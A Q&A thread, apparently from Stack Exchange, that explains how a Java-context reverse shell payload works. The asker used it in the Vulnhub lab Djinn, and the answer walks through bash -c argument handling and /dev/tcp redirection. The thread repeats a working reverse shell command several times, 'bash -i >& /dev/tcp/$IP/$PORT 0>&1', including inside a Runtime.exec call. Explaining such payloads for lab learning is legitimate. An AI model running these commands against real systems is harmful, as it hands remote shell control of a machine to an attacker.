# What does this reverse shell payload "bash -c $@|bash 0 echo bash -i >& /dev/tcp/$IP/$PORT 0>&1" do?

Tags: bash, shell, reverse, payload

When trying to reverse shell I found this payload

```
bash -c $@|bash 0 echo bash -i >& /dev/tcp/$IP/$PORT 0>&1
```

on https://www.revshells.com/ section java.

I understand `bash -i >& /dev/tcp/$IP/$PORT 0>&1` but failed to figure out what the rest of the bash command does.

This is a lab named Djinn on Vulnhub that I've tested. I've tried the other payloads on https://revshells.com using python, nc, php does not work but the only one works is the bash command above.

This is my victim info

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Linux djinn 4.15.0-66-generic

GNU bash, version 4.4.20(1)-release (x86_64-pc-linux-gnu)

Sorry I am not able to embed images into the post.

[My victim info: id, os version, bash version](https://i.stack.imgur.com/v9PES.png)

Comment: You should include the whole java program preferably.

Comment: Please give this a reasonable title.

Comment: @KamilCuk I did not use Java to do this lab. I just used its payload, the whole code will mess it up.

Comment: @cornuz My bad. Updated

Answer (score 1):

> ```
> p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.10.10.10/9001 0>&1");
> ```

Fun fact: `Runtime.getRuntime().exec` does **not** expand `$@` and does **not** intepret `>&`. You may see in `strace` output:

```
$ strace -ff java shell |& grep bash
execve("/usr/bin/bash", ["bash", "-c", "$@|bash", "0", "echo", "bash", "-i", ">&", "/dev/tcp/10.10.10.10/9001", "0>&1"]...
```

The syntax is (see `man bash`):

```
bash -c <script_to_run>  <assign to $0> <assign to $1> <$2> <$3 so on>...
```

So it looks like:

```
bash -c $@|bash 0 echo bash -i >& /dev/tcp/$IP/$PORT 0>&1
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - arguments from $0  
        ^^^^^^^ - script to run
```

The `0` is assigned to `$0`, `echo` to `$1` and so on.

Then `bash -c` executes the script `$@ | bash`. First `$0` argument is expanded (see `man bash`) to the list of arguments from `1`, so `$@` expands to `echo bash -i >& /dev/tcp/$IP/$PORT 0>&1` (note: `>&` are **not** interpreted and are strings here).

```
echo bash -i '>&' '/dev/tcp/$IP/$PORT' '0>&1' | bash
```

Then `echo ... | bash` is executed, `|` is a pipe and `echo` outputs `bash -i >& /dev/tcp/$IP/$PORT 0>&1`. On the right side of `|` `bash` listens for commands to execute, so it will execute `bash -i >& /dev/tcp/$IP/$PORT 0>&1` as this is the output from `echo`.

```
bash -i >& /dev/tcp/$IP/$PORT 0>&1
```

Now the right side `| bash` will interpret `>& 0>&1` as redirectons. The shell will spawn yet another `bash` with `-i` argument - ie. will spawn an interactive bash shell, with `>&` stderr and stdout redirected to `/dev/tcp/$IP/$PORT` and then `0>&1` the string is also connected to `/dev/tcp/$IP/$PORT`. `/dev/tcp/$IP/$PORT` is a special (builtin?) file that allows bash to send/receive from a network location - ie. writing or reading from `/dev/tcp/$IP/$PORT` is like communicating with the remote host.